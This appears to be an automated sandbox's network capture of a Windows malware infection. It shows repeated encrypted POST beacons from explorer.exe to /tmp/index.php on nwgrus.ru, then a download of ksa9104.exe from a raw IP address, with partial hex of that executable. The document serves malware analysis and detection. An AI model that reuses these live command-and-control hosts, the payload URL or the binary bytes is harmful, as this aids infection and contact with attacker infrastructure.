                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.449859190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:13.987952948 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://cktuxsueygng.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 202
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:13.987977982 CEST202OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 28 2d ed ab
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[*k,vu(-EFYNkmKvNu0ht<VPM+xcTNo+%^c19v&Jl[_N
                                                          Oct 12, 2024 22:29:15.061553955 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:14 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.449870190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:29:15.070422888 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://dxcesnnxlrm.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 356
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:29:15.070442915 CEST356OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 5b 14 ca fb
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[+k,vu[\BX}J~iFS_:iGq;AzO"-#e <W%3wP}MA<-8*nEX|wo{17
                                                          Oct 12, 2024 22:29:16.143505096 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:29:15 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.450043190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:30:25.196594954 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://rdmqecpndyox.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 227
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:30:25.196616888 CEST227OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 27 f9 a6
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu@'Igjwe0~\-`B-"iP[\M_bmj?Na1nq2{&W_n]AVkZ|tt"l
                                                          Oct 12, 2024 22:30:26.260431051 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:30:26 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.450044190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:30:31.925354004 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://lqwauqujlltwos.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 173
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:30:31.925384998 CEST173OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 09 a0 ad
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vuEFR(T|#1]zP.<?'X]S[n}~:C*q<O/
                                                          Oct 12, 2024 22:30:33.004900932 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:30:32 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.450045190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:30:40.937889099 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://uciyasnlqtuqe.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 292
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:30:40.937935114 CEST292OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 26 b0 f1
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vuZ&i@Wx:wr]"6"k~la\yG?,J[Q#@DvPU4c|2O=uF1vh\g%uUi]&iudN
                                                          Oct 12, 2024 22:30:42.007350922 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:30:41 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.450046190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:30:51.742774963 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ansjcylnamd.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 208
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:30:51.742810011 CEST208OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 1e c8 93
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu~W_Q@Ri<x*0kfE2@0FU87BEST{W$s%HVT(0HZ
                                                          Oct 12, 2024 22:30:52.824522018 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:30:52 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.450047175.119.10.231802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:31:04.785314083 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://xcmbohrajfpmnq.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 338
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:31:04.785346985 CEST338OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 33 f3 ff
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vuK3L1qotp2-<kB(<I\0!#K?\MyX1\M`T}C(M[EVwdP==ccLa*^S
                                                          Oct 12, 2024 22:31:06.258120060 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:31:05 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.450048175.119.10.231802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:31:19.249269009 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://elwljkaryvt.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 229
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:31:19.249310017 CEST229OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 2e c9 86
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu}.ncd~54O :9]VlT]]Z@^J.H}& mxQ3TGFDgAO6(S~r]
                                                          Oct 12, 2024 22:31:20.968141079 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:31:20 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.450049175.119.10.231802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:31:34.612454891 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ctivelvucvmgu.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 137
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:31:34.612473011 CEST137OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 28 f9 85
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vug(bO2V_Z2>FJ/!|_
                                                          Oct 12, 2024 22:31:36.113661051 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:31:35 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.450050175.119.10.231802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:31:48.995564938 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://coulxlduqqt.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 261
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:31:48.995596886 CEST261OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5e 5e e0 ea
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu^^zbes>&f6[cIJLNSvLHPe/,dhXe_,L1K`Z=)sDsV=_0X)Ot
                                                          Oct 12, 2024 22:31:50.445827961 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:31:50 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.450051175.119.10.231802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:32:03.964360952 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://pohgsixvlqwy.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 301
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:32:03.964402914 CEST301OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 33 c6 9a
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu@3fExYT;$y<}-y.h)"djz0KW0QBHtQX?tk;U{'Wz<ULQIrxhr8*]
                                                          Oct 12, 2024 22:32:05.414036036 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:32:05 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.44977923.145.40.1644432580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-12 20:29:01 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: 23.145.40.164
                                                          2024-10-12 20:29:01 UTC327INHTTP/1.1 200 OK
                                                          Date: Sat, 12 Oct 2024 20:29:01 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          Last-Modified: Sat, 12 Oct 2024 20:00:02 GMT
                                                          ETag: "3b400-6244d0c961390"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 242688
                                                          Connection: close
                                                          Content-Type: application/x-msdos-program
                                                          2024-10-12 20:29:01 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 e1 fc 79 dc 80 92 2a dc 80 92 2a dc 80 92 2a c2 d2 16 2a c7 80 92 2a c2 d2 07 2a cc 80 92 2a c2 d2 11 2a 96 80 92 2a fb 46 e9 2a d9 80 92 2a dc 80 93 2a b2 80 92 2a c2 d2 18 2a dd 80 92 2a c2 d2 06 2a dd 80 92 2a c2 d2 03 2a dd 80 92 2a 52 69 63 68 dc 80 92 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 7a af e0 64 00 00 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$y*********F**********Rich*PELzd
                                                          2024-10-12 20:29:01 UTC8000INData Raw: 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 91 13 00 00 83 c4 14 56 e8 7b 2d 00 00 40 59 83 f8 3c 76 38 56 e8 6e 2d 00 00 83 ee 3b 03 c6 6a 03 b9 5c aa 41 00 68 74 67 41 00 2b c8 51 50 e8 9c 2c 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4e 13 00 00 83 c4 14 eb 02 33 f6 68 70 67 41 00 53 57 e8 02 2c 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 2a 13 00 00 83 c4 14 8b 45 fc ff 34 c5 ac 92 41 00 53 57 e8 dd 2b 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 05 13 00 00 83 c4 14 68 10 20 01 00 68 48 67 41 00 57 e8 50 2a 00 00 83 c4 0c eb 32 6a f4 ff 15 04 61 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac 92 41 00 ff 36 e8 b9 2c 00 00 59 50 ff 36 53 ff 15 00 61 41 00 5f 5e 5b c9 c3 6a 03 e8 95 2d 00 00 59 83 f8 01 74 15 6a 03 e8 88
                                                          Data Ascii: t3PPPPPV{-@Y<v8Vn-;j\AhtgA+QP,t3VVVVVN3hpgASW,tVVVVV*E4ASW+tVVVVVh hHgAWP*2jaA;t$tjEP4A6,YP6SaA_^[j-Ytj
                                                          2024-10-12 20:29:01 UTC8000INData Raw: 85 d2 74 07 c6 02 00 42 89 55 0c ff 07 8b 4d 10 e9 0e ff ff ff 8b 45 08 5e 5b 85 c0 74 03 83 20 00 ff 01 c9 c3 8b ff 55 8b ec 83 ec 0c 53 33 db 56 57 39 1d 70 8f b1 02 75 05 e8 fe ea ff ff 68 04 01 00 00 be e8 aa 41 00 56 53 88 1d ec ab 41 00 ff 15 94 60 41 00 a1 60 8f b1 02 89 35 a4 a2 41 00 3b c3 74 07 89 45 fc 38 18 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 77 05 00 00 8b f0 59 3b f3 74 29 8b 55 fc 8d 45 f8 50 03 fe 57 56 8d 7d f4 e8 c9 fd ff ff 8b 45 f8 83 c4 0c 48 a3 88 a2 41 00 89 35 8c a2 41 00 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec a1 f0 ab 41 00 83 ec 0c 53 56 8b 35 44 61 41 00 57 33 db 33 ff 3b c3 75 2e ff
                                                          Data Ascii: tBUME^[t US3VW9puhAVSA`A`5A;tE8uuUEPSS}E=?sJMsB;r6PwY;t)UEPWV}EHA5A3_^[UASV5DaAW33;u.
                                                          2024-10-12 20:29:01 UTC8000INData Raw: 89 b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff ff 66 8c 85 c4 fd ff ff 66 8c a5 c0 fd ff ff 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 75 04 8d 45 04 89 85 f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 b5 e8 fd ff ff 8b 40 fc 6a 50 89 85 e4 fd ff ff 8d 85 d8 fc ff ff 6a 00 50 e8 65 e5 ff ff 8d 85 d8 fc ff ff 83 c4 0c 89 85 28 fd ff ff 8d 85 30 fd ff ff 6a 00 c7 85 d8 fc ff ff 15 00 00 40 89 b5 e4 fc ff ff 89 85 2c fd ff ff ff 15 d8 60 41 00 8d 85 28 fd ff ff 50 ff 15 d4 60 41 00 6a 03 e8 c9 ac ff ff cc 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 83 a7 ff ff 0f b6 45 0c 8b 4d f4 8a 55 14 84 54 01 1d 75 1e 83 7d 10 00 74 12 8b 4d f0 8b 89 c8 00 00 00 0f b7 04 41 23 45 10 eb 02 33 c0 85 c0 74 03 33 c0 40 80
                                                          Data Ascii: ffffffuE0@jPjPe(0j@,`A(P`AjUuMEMUTu}tMA#E3t3@
